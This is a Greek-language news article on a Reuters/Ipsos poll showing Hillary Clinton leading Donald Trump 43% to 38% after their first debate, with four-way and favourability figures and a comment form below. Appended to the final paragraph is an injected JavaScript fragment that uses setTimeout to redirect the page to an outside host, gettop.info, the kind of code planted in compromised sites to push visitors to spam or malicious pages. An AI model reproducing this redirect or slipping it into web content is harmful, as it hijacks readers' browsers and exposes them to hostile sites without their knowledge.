Προβάδισμα πέντε μονάδων για τη Χίλαρι Κλίντον

0
3

 

Mε διαφορά 5 μονάδων προγγείται η Δημοκρατική υποψήφια Χίλαρι Κλίντον στην προεδρική κούρσα με τον Ρεπουμπλικανό Ντόναλντ Τραμπ σύμφωνα με δημοσκόπηση του ινστιτούτου Ipsos και του πρακτορείου Reuters.

Σύμφωνα με τα συμπερέσματα, δεν έχουν αλλάξει σημαντικά τα ποσοστά των δύο βασικών υποψηφίων μετά την πρώτη τηλεοπτική «μάχη» τους, που φέρνουν μπροστά τη Χίλαρι Κλίντον με 43% έναντι 38% του Τραμπ. Το 19% απάντησαν ότι δεν θα επέλεγε κανέναν από τους δύο.

Η Κλίντον προηγείται σχεδόν σε όλες τις δημοσκοπήσεις που έχουν διενεργηθεί από τις αρχές του έτους. Τις τελευταίες τέσσερις εβδομάδες το προβάδισμά της παραμένει σταθερό, στις 4-5 μονάδες.

Σε ξεχωριστή δημοσκόπηση όπου περιλαμβάνονται και οι υπόλοιποι υποψήφιοι, η Χίλαρι Κλίντον προηγείται με ποσοστό 42%. Ακολουθούν ο Τραμπ με 38%, ο φιλελεύθερος Γκάρι Τζόνσον με 7% και η Τζιλ Στάιν των Πρασίνων με 3%.

Το 48% είπαν ότι έχουν μάλλον θετική άποψη για την Κλίντον σε σχέση με το 45% της πρασμένης εβδομάδας αλλά επίσης αύξηση σημείωσε και η δημοτικότητα του Τραμπ με 46% έναντι 44% στην προηγούμενη δημοσκόπηση. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here